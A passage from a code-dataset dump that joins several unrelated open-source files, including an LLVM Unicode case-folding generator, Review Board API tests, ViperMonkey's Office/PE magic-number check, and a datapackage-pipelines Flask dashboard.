        # Special case for handling blocks of length 1. We don't even need to
        # emit the "if (C < X) return C" check below as all characters in this
        # range will be caught by the "C < X" check emitted by the first
        # non-trivial block.
        body += " // {2}\n if (C == {0:#06x})\n return {1:#06x};\n".format(*b[0])
        return

    first = b[0][0]
    # Last from_char in the block: first + stride * (count - 1).
    last = first + stride(b) * (len(b)-1)
    modulo = first % stride(b)

    # All characters before this block map to themselves.
    body += " if (C < {0:#06x})\n return C;\n".format(first)
    body += " // {0} characters\n".format(len(b))

    # Generic pattern: check upper bound (lower bound is checked by the "if"
    # above) and modulo of C, return C+shift.
    pattern = " if (C <= {0:#06x} && C % {1} == {2})\n return C + {3};\n"

    if stride(b) == 2 and shift(b[0]) == 1 and modulo == 0:
        # Special case:
        # We can elide the modulo-check because the expression "C|1" will map
        # the intervening characters to themselves.
        pattern = " if (C <= {0:#06x})\n return C | 1;\n"
    elif stride(b) == 1:
        # Another special case: X % 1 is always zero, so don't emit the
        # modulo-check.
        pattern = " if (C <= {0:#06x})\n return C + {3};\n"

    body += pattern.format(last, stride(b), modulo, shift(b[0]))
# Driver: group the sorted mappings into maximal blocks of constant shift and
# stride, emitting each finished block into `body`.
current_block = []
# sys.argv[1] is the URL of the Unicode CaseFolding.txt database.
# NOTE(review): urllib2 and the print statements below make this Python 2 only.
f = urllib2.urlopen(sys.argv[1])
for m in mappings(f):
    if len(current_block) == 0:
        current_block.append(m)
        continue

    if shift(current_block[0]) != shift(m):
        # Incompatible shift, start a new block.
        dump_block(current_block)
        current_block = [m]
        continue

    if len(current_block) == 1 or stride(current_block) == stride2(current_block[-1], m):
        current_block.append(m)
        continue

    # Incompatible stride, start a new block.
    dump_block(current_block)
    current_block = [m]
f.close()

# Flush the final (possibly singleton) block.
dump_block(current_block)

# Emit the generated C++ translation unit to stdout.
print '//===---------- Support/UnicodeCaseFold.cpp -------------------------------===//'
print '//'
print '// This file was generated by utils/unicode-case-fold.py from the Unicode'
print '// case folding database at'
print '// ', sys.argv[1]
print '//'
print '// To regenerate this file, run:'
print '// utils/unicode-case-fold.py \\'
print '// "{}" \\'.format(sys.argv[1])
print '// > lib/Support/UnicodeCaseFold.cpp'
print '//'
print '//===----------------------------------------------------------------------===//'
print ''
print '#include "llvm/Support/Unicode.h"'
print ''
print "int llvm::sys::unicode::foldCharSimple(int C) {"
print body
print " return C;"
print "}"
|
reviewboard/webapi/tests/test_review_screenshot_comment.py | ParikhKadam/reviewboard | 921 | 10105 | <filename>reviewboard/webapi/tests/test_review_screenshot_comment.py<gh_stars>100-1000
from __future__ import unicode_literals
from django.contrib.auth.models import User
from djblets.webapi.errors import PERMISSION_DENIED
from reviewboard.reviews.models import ScreenshotComment
from reviewboard.webapi.resources import resources
from reviewboard.webapi.tests.base import BaseWebAPITestCase
from reviewboard.webapi.tests.mimetypes import (
screenshot_comment_item_mimetype,
screenshot_comment_list_mimetype)
from reviewboard.webapi.tests.mixins import (
BasicTestsMetaclass,
ReviewRequestChildItemMixin,
ReviewRequestChildListMixin)
from reviewboard.webapi.tests.mixins_comment import (
CommentItemMixin,
CommentListMixin)
from reviewboard.webapi.tests.urls import (
get_review_screenshot_comment_item_url,
get_review_screenshot_comment_list_url)
class BaseTestCase(BaseWebAPITestCase):
    fixtures = ['test_users']

    def _create_screenshot_review_with_issue(self, publish=False,
                                             comment_text=None):
        """Sets up a review for a screenshot that includes an open issue.

        If `publish` is True, the review is published. The review request is
        always published.

        Returns the response from posting the comment, the review object, and
        the review request object.
        """
        # Fall back to a default comment body when none was supplied.
        comment_text = (comment_text or
                        'Test screenshot comment with an opened issue')

        review_request = self.create_review_request(publish=True,
                                                    submitter=self.user)
        screenshot = self.create_screenshot(review_request)
        review = self.create_review(review_request, user=self.user,
                                    publish=publish)
        comment = self.create_screenshot_comment(review, screenshot,
                                                 comment_text,
                                                 issue_opened=True)

        return comment, review, review_request
class ResourceListTests(CommentListMixin, ReviewRequestChildListMixin,
                        BaseTestCase, metaclass=BasicTestsMetaclass):
    """Testing the ReviewScreenshotCommentResource list APIs."""

    sample_api_url = 'review-requests/<id>/reviews/<id>/screenshot-comments/'
    resource = resources.review_screenshot_comment

    def setup_review_request_child_test(self, review_request):
        # Fixture hook for the shared ReviewRequestChildListMixin tests:
        # returns the list URL and its expected mimetype.
        self.create_screenshot(review_request)
        review = self.create_review(review_request, user=self.user)

        return (get_review_screenshot_comment_list_url(review),
                screenshot_comment_list_mimetype)

    def compare_item(self, item_rsp, comment):
        # Field-by-field comparison of a serialized comment payload against
        # the ScreenshotComment model instance.
        self.assertEqual(item_rsp['id'], comment.pk)
        self.assertEqual(item_rsp['text'], comment.text)
        self.assertEqual(item_rsp['x'], comment.x)
        self.assertEqual(item_rsp['y'], comment.y)
        self.assertEqual(item_rsp['w'], comment.w)
        self.assertEqual(item_rsp['h'], comment.h)
        self.assertEqual(item_rsp['extra_data'], comment.extra_data)

        if comment.rich_text:
            self.assertEqual(item_rsp['text_type'], 'markdown')
        else:
            self.assertEqual(item_rsp['text_type'], 'plain')

    #
    # HTTP GET tests
    #

    def setup_basic_get_test(self, user, with_local_site, local_site_name,
                             populate_items):
        # Fixture hook consumed by metaclass-generated GET tests; the tuple
        # shape (url, mimetype, items) is fixed by the test framework.
        review_request = self.create_review_request(
            with_local_site=with_local_site,
            submitter=user,
            publish=True)
        screenshot = self.create_screenshot(review_request)
        review = self.create_review(review_request, user=user)

        if populate_items:
            items = [self.create_screenshot_comment(review, screenshot)]
        else:
            items = []

        return (get_review_screenshot_comment_list_url(review,
                                                       local_site_name),
                screenshot_comment_list_mimetype,
                items)

    #
    # HTTP POST tests
    #

    def setup_basic_post_test(self, user, with_local_site, local_site_name,
                              post_valid_data):
        # Fixture hook consumed by metaclass-generated POST tests; the tuple
        # shape (url, mimetype, post_data, extra_args) is fixed.
        review_request = self.create_review_request(
            with_local_site=with_local_site,
            submitter=user,
            publish=True)
        screenshot = self.create_screenshot(review_request)
        review = self.create_review(review_request, user=user)

        return (get_review_screenshot_comment_list_url(review,
                                                       local_site_name),
                screenshot_comment_item_mimetype,
                {
                    'screenshot_id': screenshot.pk,
                    'text': 'Test comment',
                    'x': 2,
                    'y': 2,
                    'w': 10,
                    'h': 10,
                },
                [review, screenshot])

    def check_post_result(self, user, rsp, review, screenshot):
        # Verify the POSTed comment round-trips through the database.
        comment = \
            ScreenshotComment.objects.get(pk=rsp['screenshot_comment']['id'])
        self.compare_item(rsp['screenshot_comment'], comment)

    def test_post_with_issue(self):
        """Testing the
        POST review-requests/<id>/reviews/<id>/screenshot-comments/ API
        with an issue
        """
        comment_text = "Test screenshot comment with an opened issue"
        comment, review, review_request = \
            self._create_screenshot_review_with_issue(
                publish=False, comment_text=comment_text)

        rsp = self.api_get(
            get_review_screenshot_comment_list_url(review),
            expected_mimetype=screenshot_comment_list_mimetype)

        self.assertEqual(rsp['stat'], 'ok')
        self.assertIn('screenshot_comments', rsp)
        self.assertEqual(len(rsp['screenshot_comments']), 1)
        self.assertEqual(rsp['screenshot_comments'][0]['text'], comment_text)
        self.assertTrue(rsp['screenshot_comments'][0]['issue_opened'])
class ResourceItemTests(CommentItemMixin, ReviewRequestChildItemMixin,
BaseTestCase, metaclass=BasicTestsMetaclass):
"""Testing the ReviewScreenshotCommentResource item APIs."""
fixtures = ['test_users']
sample_api_url = \
'review-requests/<id>/reviews/<id>/screenshot-comments/<id>/'
resource = resources.review_screenshot_comment
def compare_item(self, item_rsp, comment):
self.assertEqual(item_rsp['id'], comment.pk)
self.assertEqual(item_rsp['text'], comment.text)
self.assertEqual(item_rsp['x'], comment.x)
self.assertEqual(item_rsp['y'], comment.y)
self.assertEqual(item_rsp['w'], comment.w)
self.assertEqual(item_rsp['h'], comment.h)
self.assertEqual(item_rsp['extra_data'], comment.extra_data)
if comment.rich_text:
self.assertEqual(item_rsp['text_type'], 'markdown')
else:
self.assertEqual(item_rsp['text_type'], 'plain')
def setup_review_request_child_test(self, review_request):
screenshot = self.create_screenshot(review_request)
review = self.create_review(review_request, user=self.user)
comment = self.create_screenshot_comment(review, screenshot)
return (get_review_screenshot_comment_item_url(review, comment.pk),
screenshot_comment_item_mimetype)
#
# HTTP DELETE tests
#
def setup_basic_delete_test(self, user, with_local_site, local_site_name):
review_request = self.create_review_request(
with_local_site=with_local_site,
submitter=user,
publish=True)
screenshot = self.create_screenshot(review_request)
review = self.create_review(review_request, user=user)
comment = self.create_screenshot_comment(review, screenshot)
return (get_review_screenshot_comment_item_url(review, comment.pk,
local_site_name),
[comment, review])
def check_delete_result(self, user, comment, review):
self.assertNotIn(comment, review.screenshot_comments.all())
def test_delete_with_does_not_exist_error(self):
"""Testing the
DELETE review-requests/<id>/reviews/<id>/screenshot-comments/<id>/ API
with Does Not Exist error
"""
review_request = self.create_review_request(publish=True)
self.create_screenshot(review_request)
review = self.create_review(review_request, user=self.user)
self.api_delete(get_review_screenshot_comment_item_url(review, 123),
expected_status=404)
#
# HTTP GET tests
#
def setup_basic_get_test(self, user, with_local_site, local_site_name):
review_request = self.create_review_request(
with_local_site=with_local_site,
submitter=user,
publish=True)
screenshot = self.create_screenshot(review_request)
review = self.create_review(review_request, user=user)
comment = self.create_screenshot_comment(review, screenshot)
return (get_review_screenshot_comment_item_url(review, comment.pk,
local_site_name),
screenshot_comment_item_mimetype,
comment)
#
# HTTP PUT tests
#
def setup_basic_put_test(self, user, with_local_site, local_site_name,
put_valid_data):
review_request = self.create_review_request(
with_local_site=with_local_site,
submitter=user,
publish=True)
screenshot = self.create_screenshot(review_request)
review = self.create_review(review_request, user=user)
comment = self.create_screenshot_comment(review, screenshot)
return (get_review_screenshot_comment_item_url(review, comment.pk,
local_site_name),
screenshot_comment_item_mimetype,
{'text': 'Test comment'},
comment,
[])
def check_put_result(self, user, item_rsp, comment, *args):
comment = ScreenshotComment.objects.get(pk=comment.pk)
self.assertEqual(item_rsp['text_type'], 'plain')
self.assertEqual(item_rsp['text'], 'Test comment')
self.compare_item(item_rsp, comment)
def test_put_with_issue(self):
"""Testing the
PUT review-requests/<id>/reviews/<id>/screenshot-comments/<id>/ API
with an issue, removing issue_opened
"""
comment, review, review_request = \
self._create_screenshot_review_with_issue()
rsp = self.api_put(
get_review_screenshot_comment_item_url(review, comment.pk),
{'issue_opened': False},
expected_mimetype=screenshot_comment_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
self.assertFalse(rsp['screenshot_comment']['issue_opened'])
def test_put_issue_status_before_publish(self):
"""Testing the
PUT review-requests/<id>/reviews/<id>/screenshot-comments/<id> API
with an issue, before review is published
"""
comment, review, review_request = \
self._create_screenshot_review_with_issue()
# The issue_status should not be able to be changed while the review is
# unpublished.
rsp = self.api_put(
get_review_screenshot_comment_item_url(review, comment.pk),
{'issue_status': 'resolved'},
expected_mimetype=screenshot_comment_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
# The issue_status should still be "open"
self.assertEqual(rsp['screenshot_comment']['issue_status'], 'open')
def test_put_issue_status_after_publish(self):
"""Testing the
PUT review-requests/<id>/reviews/<id>/screenshot-comments/<id>/ API
with an issue, after review is published
"""
comment, review, review_request = \
self._create_screenshot_review_with_issue(publish=True)
rsp = self.api_put(
get_review_screenshot_comment_item_url(review, comment.pk),
{'issue_status': 'resolved'},
expected_mimetype=screenshot_comment_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
self.assertEqual(rsp['screenshot_comment']['issue_status'], 'resolved')
    def test_put_issue_status_by_issue_creator(self):
        """Testing the
        PUT review-requests/<id>/reviews/<id>/screenshot-comments/<id>/ API
        permissions for issue creator
        """
        comment, review, review_request = \
            self._create_screenshot_review_with_issue(publish=True)
        # Change the owner of the review request so that it's not owned by
        # self.user
        review_request.submitter = User.objects.get(username='doc')
        review_request.save()
        # The review/comment (and therefore issue) is still owned by self.user,
        # so we should be able to change the issue status.
        rsp = self.api_put(
            get_review_screenshot_comment_item_url(review, comment.pk),
            {'issue_status': 'dropped'},
            expected_mimetype=screenshot_comment_item_mimetype)
        self.assertEqual(rsp['stat'], 'ok')
        self.assertEqual(rsp['screenshot_comment']['issue_status'], 'dropped')
    def test_put_issue_status_by_uninvolved_user(self):
        """Testing the
        PUT review-requests/<id>/reviews/<id>/screenshot-comments/<id>/ API
        permissions for an uninvolved user
        """
        comment, review, review_request = \
            self._create_screenshot_review_with_issue(publish=True)
        # Change the owner of the review request and review so that they're not
        # owned by self.user.
        new_owner = User.objects.get(username='doc')
        review_request.submitter = new_owner
        review_request.save()
        review.user = new_owner
        review.save()
        # With no ownership of either the review request or the review, the
        # status change must be rejected with a 403.
        rsp = self.api_put(
            get_review_screenshot_comment_item_url(review, comment.pk),
            {'issue_status': 'dropped'},
            expected_status=403)
        self.assertEqual(rsp['stat'], 'fail')
        self.assertEqual(rsp['err']['code'], PERMISSION_DENIED.code)
    def test_put_deleted_screenshot_comment_issue_status(self):
        """Testing the
        PUT review-requests/<id>/reviews/<id>/screenshot-comments/<id>
        API with an issue and a deleted screenshot
        """
        comment_text = "Test screenshot comment with an opened issue"
        x, y, w, h = (2, 2, 10, 10)
        review_request = self.create_review_request(publish=True,
                                                    submitter=self.user,
                                                    target_people=[self.user])
        screenshot = self.create_screenshot(review_request)
        review = self.create_review(review_request, user=self.user)
        comment = self.create_screenshot_comment(review, screenshot,
                                                 comment_text, x, y, w, h,
                                                 issue_opened=True)
        # First, let's ensure that the user that has created the comment
        # cannot alter the issue_status while the review is unpublished.
        rsp = self.api_put(
            get_review_screenshot_comment_item_url(review, comment.pk),
            {'issue_status': 'resolved'},
            expected_mimetype=screenshot_comment_item_mimetype)
        self.assertEqual(rsp['stat'], 'ok')
        # The issue_status should still be "open"
        self.assertEqual(rsp['screenshot_comment']['issue_status'], 'open')
        # Next, let's publish the review, and try altering the issue_status.
        # This should be allowed, since the review request was made by the
        # current user.
        review.public = True
        review.save()
        rsp = self.api_put(
            rsp['screenshot_comment']['links']['self']['href'],
            {'issue_status': 'resolved'},
            expected_mimetype=screenshot_comment_item_mimetype)
        self.assertEqual(rsp['stat'], 'ok')
        self.assertEqual(rsp['screenshot_comment']['issue_status'], 'resolved')
        # Delete the screenshot.
        self._delete_screenshot(review_request, screenshot)
        review_request.publish(review_request.submitter)
        # Try altering the issue_status. This should be allowed even though
        # the screenshot the comment was filed against no longer exists.
        rsp = self.api_put(
            rsp['screenshot_comment']['links']['self']['href'],
            {'issue_status': 'open'},
            expected_mimetype=screenshot_comment_item_mimetype)
        self.assertEqual(rsp['stat'], 'ok')
        self.assertEqual(rsp['screenshot_comment']['issue_status'], 'open')
|
examples/api/default_value.py | clamdad/atom | 222 | 10118 | <filename>examples/api/default_value.py
# --------------------------------------------------------------------------------------
# Copyright (c) 2013-2021, Nucleic Development Team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file LICENSE, distributed with this software.
# --------------------------------------------------------------------------------------
""" Demonstrate all the ways to initialize a value
1. Pass the value directly
2. Assign the default value explicitly
3. Provide the value during initialization of the object
4. Provide factory callable that returns a value
5. Use a _default_* static method
"""
import sys
from atom.api import Atom, Int, Str
def get_mother():
    """Build the default mother's name from the system-derived last name."""
    return " ".join(["Maude", get_last_name()])
def get_last_name():
    """Return a last name based on the system byteorder."""
    byte_order = sys.byteorder
    return byte_order.capitalize()
class Person(Atom):
    """A simple class representing a person object."""

    # 1. Default value passed directly to the member.
    first_name = Str("Bob")
    # 2. Default value assigned explicitly via the ``default`` keyword.
    age = Int(default=40)
    # 3. No default; the value is supplied at object initialization time.
    address = Str()
    # 4. Default produced lazily by a factory callable.
    mother = Str(factory=get_mother)
    # 5. Default computed by the ``_default_<name>`` static method below.
    last_name = Str()

    def _default_last_name(self):
        """Compute the default for ``last_name`` on first access."""
        return get_last_name()
if __name__ == "__main__":
    # Demonstrates method 3: ``address`` is provided at initialization;
    # the remaining members fall back to their configured defaults.
    bob = Person(address="101 Main")
    print((bob.first_name, bob.last_name, bob.age))
    print(bob.mother)
|
vipermonkey/core/filetype.py | lap1nou/ViperMonkey | 874 | 10124 | <reponame>lap1nou/ViperMonkey<filename>vipermonkey/core/filetype.py
"""
Check for Office file types
ViperMonkey is a specialized engine to parse, analyze and interpret Microsoft
VBA macros (Visual Basic for Applications), mainly for malware analysis.
Author: <NAME> - http://www.decalage.info
License: BSD, see source code or documentation
Project Repository:
https://github.com/decalage2/ViperMonkey
"""
# === LICENSE ==================================================================
# ViperMonkey is copyright (c) 2015-2016 <NAME> (http://www.decalage.info)
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# Office magic numbers.
# NOTE: tokens are produced with hex() and are NOT zero padded (see
# get_1st_8_bytes), which is why the Office 2007 signature reads "3 4"
# rather than "03 04".
magic_nums = {
    "office97" : "D0 CF 11 E0 A1 B1 1A E1", # Office 97
    "office2007" : "50 4B 3 4", # Office 2007+ (PKZip)
}

# PE magic number.
pe_magic_num = "4D 5A"
def get_1st_8_bytes(fname, is_data):
    """Return the first 8 bytes of a file (or raw data) as a hex string.

    fname - Either a file name or the raw data itself.
    is_data - If True, treat fname as raw data rather than a file name.

    return - A string of space-separated, uppercase, unpadded hex tokens,
    e.g. "D0 CF 11 E0 A1 B1 1A E1 " (0x03 renders as "3", matching the
    magic number strings defined in this module).
    """

    # Long strings can't be file names; treat them as data.
    is_data = (is_data or (len(fname) > 200))

    # If it can't be opened as a file, fall back to treating it as data.
    # Catch Exception rather than using a bare except so that signals such
    # as KeyboardInterrupt still propagate.
    if (not is_data):
        try:
            tmp = open(fname, 'rb')
            tmp.close()
        except Exception:
            is_data = True

    # Read the first 8 bytes, either from the file or from the data itself.
    if (not is_data):
        with open(fname, 'rb') as f:
            info = f.read(8)
    else:
        # NOTE: this previously sliced 9 characters; 8 matches the file
        # read above, and all callers do prefix matches, so results are
        # unchanged for every magic number in this module.
        info = fname[:8]

    # Convert to a hex token string. Iterating a Python 3 bytes object
    # yields ints, while iterating a str yields 1-char strings; handle both.
    curr_magic = ""
    for b in info:
        code = b if isinstance(b, int) else ord(b)
        curr_magic += hex(code).replace("0x", "").upper() + " "

    return curr_magic
def is_pe_file(fname, is_data):
    """
    Check to see if the given file is a PE executable.

    return - True if it is a PE file, False if not.
    """
    # PE executables begin with the "MZ" DOS header magic.
    magic = get_1st_8_bytes(fname, is_data)
    return magic.startswith(pe_magic_num)
def is_office_file(fname, is_data):
    """
    Check to see if the given file is a MS Office file format.

    return - True if it is an Office file, False if not.
    """
    # Match the leading bytes against every known Office signature.
    magic = get_1st_8_bytes(fname, is_data)
    return any(magic.startswith(sig) for sig in magic_nums.values())
def is_office97_file(fname, is_data):
    """Check whether the file/data starts with the Office 97 (OLE2) magic."""
    return get_1st_8_bytes(fname, is_data).startswith(magic_nums["office97"])
def is_office2007_file(fname, is_data):
    """Check whether the file/data starts with the Office 2007+ (PKZip) magic."""
    return get_1st_8_bytes(fname, is_data).startswith(magic_nums["office2007"])
|
packs/kubernetes/tests/test_third_party_resource.py | userlocalhost2000/st2contrib | 164 | 10125 | <gh_stars>100-1000
from st2tests.base import BaseSensorTestCase
from third_party_resource import ThirdPartyResource
class ThirdPartyResourceTestCase(BaseSensorTestCase):
    """Unit tests for the ThirdPartyResource sensor's payload handling."""

    sensor_cls = ThirdPartyResource

    def test_k8s_object_to_st2_trigger_bad_object(self):
        """An object missing required metadata keys raises KeyError."""
        k8s_obj = {
            'type': 'kanye',
            'object': {
                'kind': 'president',
                'metadata': {
                    'name': 'west',
                    'namespace': 'westashians'
                    # uid missing
                    # label missing
                }
            }
        }
        sensor = self.get_sensor_instance()
        self.assertRaises(KeyError, sensor._k8s_object_to_st2_trigger, k8s_obj)

    def test_k8s_object_to_st2_trigger(self):
        """A well-formed object maps onto the expected trigger payload."""
        k8s_obj = {
            'type': 'kanye',
            'object': {
                'kind': 'president',
                'metadata': {
                    'name': 'west',
                    'namespace': 'westashians',
                    'uid': 'coinye',
                    'labels': ['rapper', 'train wrecker']
                }
            }
        }
        sensor = self.get_sensor_instance()
        payload = sensor._k8s_object_to_st2_trigger(k8s_obj)
        # assertIn/assertIsNotNone give clearer failure messages than the
        # previous assertTrue(x in y) / assertTrue(x is not None) forms.
        self.assertIn('resource', payload)
        self.assertEqual(payload['resource'], k8s_obj['type'])
        self.assertIn('object_kind', payload)
        self.assertEqual(payload['object_kind'], k8s_obj['object']['kind'])
        self.assertIn('name', payload)
        self.assertEqual(payload['name'], k8s_obj['object']['metadata']['name'])
        self.assertIn('labels', payload)
        self.assertListEqual(payload['labels'],
                             k8s_obj['object']['metadata']['labels'])
        self.assertIn('namespace', payload)
        self.assertEqual(payload['namespace'],
                         k8s_obj['object']['metadata']['namespace'])
        self.assertIn('uid', payload)
        self.assertEqual(payload['uid'], k8s_obj['object']['metadata']['uid'])

    def test_get_trigger_payload_from_line(self):
        """A JSON line from the watch stream is parsed into a payload."""
        line = '{"object": {"kind": "president", ' + \
               '"metadata": {"labels": ["rapper", "train wrecker"], ' + \
               '"namespace": "westashians", ' + \
               '"name": "west", "uid": "coinye"}}, "type": "kanye"}'
        sensor = self.get_sensor_instance()
        payload = sensor._get_trigger_payload_from_line(line)
        self.assertIsNotNone(payload)
        self.assertIn('resource', payload)
        self.assertIn('object_kind', payload)
        self.assertIn('name', payload)
        self.assertIn('labels', payload)
        self.assertIn('namespace', payload)
        self.assertIn('uid', payload)
|
bbio/bbio.py | timgates42/PyBBIO | 102 | 10129 | <filename>bbio/bbio.py
"""
PyBBIO - bbio.py
Copyright (c) 2012-2015 - <NAME> <<EMAIL>>
Released under the MIT license
https://github.com/graycatlabs/PyBBIO
"""
import sys, atexit
from .platform import platform_init, platform_cleanup
from .common import ADDITIONAL_CLEANUP, util_init
def bbio_init():
  """ Pre-run initialization, i.e. starting module clocks, etc. """
  # Utility helpers must be ready before platform-specific setup runs.
  util_init()
  platform_init()
def bbio_cleanup():
  """ Post-run cleanup, i.e. stopping module clocks, etc. """
  # Run user cleanup routines:
  for cleanup in ADDITIONAL_CLEANUP:
    try:
      cleanup()
    except Exception as e:
      # Something went wrong with one of the cleanup routines, but we
      # want to keep going; just print the error and continue
      # (Python 2 ``print`` statement; this module targets Python 2.)
      print "*Exception raised trying to call cleanup routine '%s':\n %s" %\
            (cleanup, e)
  platform_cleanup()
# The following code detects if Python is running interactively,
# and if so initializes PyBBIO on import and registers PyBBIO's
# cleanup to be called at exit, otherwise it defines the run() and
# stop() methods for the file based control flow:
import __main__
if not hasattr(__main__, '__file__'):
  # We're in the interpreter, see:
  # http://stackoverflow.com/questions/2356399/tell-if-python-is-in-interactive-mode
  bbio_init()
  print "PyBBIO initialized"
  def interactive_cleanup():
    # Wrapper exists only to print a confirmation after cleanup.
    bbio_cleanup()
    print "Finished PyBBIO cleanup"
  atexit.register(interactive_cleanup)

else:
  bbio_init()
  atexit.register(bbio_cleanup)
  # Imported in a Python file, define run() and stop():
  def run(setup, loop):
    """ The main loop; must be passed a setup and a loop function.
        First the setup function will be called once, then the loop
        function will be called continuously until a stop signal is
        raised, e.g. CTRL-C or a call to the stop() function from
        within the loop. """
    try:
      setup()
      while (True):
        loop()
    except KeyboardInterrupt:
      # Manual exit signal, clean up and exit happy
      exit(0)
  def stop():
    """ Preferred way for a program to stop itself. """
    raise KeyboardInterrupt # Expected happy stop condition in run()
|
tests/unit_tests/cx_core/integration/integration_test.py | clach04/controllerx | 204 | 10137 | <gh_stars>100-1000
from cx_core import integration as integration_module
from cx_core.controller import Controller
def test_get_integrations(fake_controller: Controller):
    """get_integrations should expose exactly the supported integrations."""
    integrations = integration_module.get_integrations(fake_controller, {})
    # Fixed local-variable typo: "inteagration_names" -> "integration_names".
    integration_names = {i.name for i in integrations}
    assert integration_names == {
        "z2m",
        "zha",
        "deconz",
        "state",
        "mqtt",
        "lutron_caseta",
    }
|
datapackage_pipelines/web/server.py | gperonato/datapackage-pipelines | 109 | 10139 | import datetime
import os
from io import BytesIO
import logging
from functools import wraps
from copy import deepcopy
from collections import Counter
import slugify
import yaml
import mistune
import requests
from flask import \
Blueprint, Flask, render_template, abort, send_file, make_response
from flask_cors import CORS
from flask_jsonpify import jsonify
from flask_basicauth import BasicAuth
from datapackage_pipelines.status import status_mgr
from datapackage_pipelines.utilities.stat_utils import user_facing_stats
# Prefer the C-accelerated dumper when libyaml is available.
YAML_DUMPER = yaml.CDumper if 'CDumper' in yaml.__dict__ else yaml.Dumper
def datestr(x):
    """Render a unix timestamp as a local datetime string ('' for None)."""
    return '' if x is None else str(datetime.datetime.fromtimestamp(x))
def yamlize(x):
    """Serialize *x* to block-style YAML using the module's dumper."""
    return yaml.dump(x, default_flow_style=False, Dumper=YAML_DUMPER)
# Markdown renderer for pipeline descriptions shown in the dashboard.
markdown = mistune.Markdown(hard_wrap=True)
# Shared pipeline status manager backing all views below.
status = status_mgr()
def make_hierarchies(statuses):
    """Turn flat, slash-separated pipeline ids into a nested tree of
    ``{'pipelines': [...], 'children': {...}}`` nodes for the dashboard.
    """

    def group(lvl):
        # Entries whose id has one remaining segment belong at this level;
        # deeper entries are grouped by their leading segment and recursed.
        pipelines = list(filter(lambda x: len(x['id']) == 1, lvl))
        children_ = list(filter(lambda x: len(x['id']) > 1, lvl))
        groups_ = {}
        for child in children_:
            # Pops the leading segment in place, shortening the id list.
            child_key = child['id'].pop(0)
            groups_.setdefault(child_key, []).append(child)
        children_ = dict(
            (k, group(v))
            for k, v in groups_.items()
        )
        for p in pipelines:
            # Collapse the single-element id list to its bare segment.
            p['id'] = p['id'][0]
        return {
            'pipelines': pipelines,
            'children': children_
        }

    def flatten(children_):
        # Collapse chains of single-child groups ("a" -> "b" becomes "a/b")
        # so the rendered tree stays shallow.
        # NOTE(review): this adds and deletes keys while iterating items(),
        # which only avoids a RuntimeError because the dict size stays
        # constant; consider iterating over list(children_.items()) —
        # confirm the intended collapse depth before changing.
        for k, v in children_.items():
            v['children'] = flatten(v['children'])
            child_keys = list(v['children'].keys())
            if len(child_keys) == 1 and len(v['pipelines']) == 0:
                child_key = child_keys[0]
                children_['/'.join([k, child_key])] = v['children'][child_key]
                del children_[k]
        return children_

    # Normalize each status into the minimal shape the dashboard needs,
    # splitting the id into path segments for grouping.
    statuses = [
        {
            'id': st['id'].split('/'),
            'title': st.get('title'),
            'stats': st.get('stats'),
            'slug': st.get('slug')
        }
        for st in statuses
    ]
    groups = group(statuses)
    children = groups.get('children', {})
    groups['children'] = flatten(children)
    return groups
def basic_auth_required(view_func):
    """
    A decorator that can be used to protect specific views with HTTP basic
    access authentication. Conditional on having BASIC_AUTH_USERNAME and
    BASIC_AUTH_PASSWORD set as env vars.
    """
    @wraps(view_func)
    def wrapper(*args, **kwargs):
        # Checked per request so configuration changes take effect
        # without restarting the app.
        if not app.config.get('BASIC_AUTH_ACTIVE', False):
            return view_func(*args, **kwargs)
        if basic_auth.authenticate():
            return view_func(*args, **kwargs)
        return basic_auth.challenge()
    return wrapper
# All dashboard/API routes hang off this blueprint; it is registered on
# the Flask app at the bottom of this module under DPP_BASE_PATH.
blueprint = Blueprint('dpp', 'dpp')
@blueprint.route("")
@blueprint.route("<path:pipeline_path>")
@basic_auth_required
def main(pipeline_path=None):
    """Render the dashboard, optionally filtered to a pipeline subtree."""
    pipeline_ids = sorted(status.all_pipeline_ids())

    # If we have a pipeline_path, filter the pipeline ids.
    if pipeline_path is not None:
        if not pipeline_path.startswith('./'):
            pipeline_path = './' + pipeline_path
        pipeline_ids = [p for p in pipeline_ids if p.startswith(pipeline_path)]

    statuses = []
    for pipeline_id in pipeline_ids:
        pipeline_status = status.get(pipeline_id)
        ex = pipeline_status.get_last_execution()
        success_ex = pipeline_status.get_last_successful_execution()
        # One display record per pipeline; 'class' maps the state onto a
        # Bootstrap context class for the template.
        pipeline_obj = {
            'id': pipeline_id.lstrip('./'),
            'title': pipeline_status.pipeline_details.get('title'),
            'stats': user_facing_stats(ex.stats) if ex else None,
            'slug': slugify.slugify(pipeline_id),
            'trigger': ex.trigger if ex else None,
            'error_log': pipeline_status.errors(),
            'state': pipeline_status.state(),
            'pipeline': pipeline_status.pipeline_details,
            'message': pipeline_status.state().capitalize(),
            'dirty': pipeline_status.dirty(),
            'runnable': pipeline_status.runnable(),
            'class': {'INIT': 'primary',
                      'QUEUED': 'primary',
                      'INVALID': 'danger',
                      'RUNNING': 'warning',
                      'SUCCEEDED': 'success',
                      'FAILED': 'danger'
                      }[pipeline_status.state()],
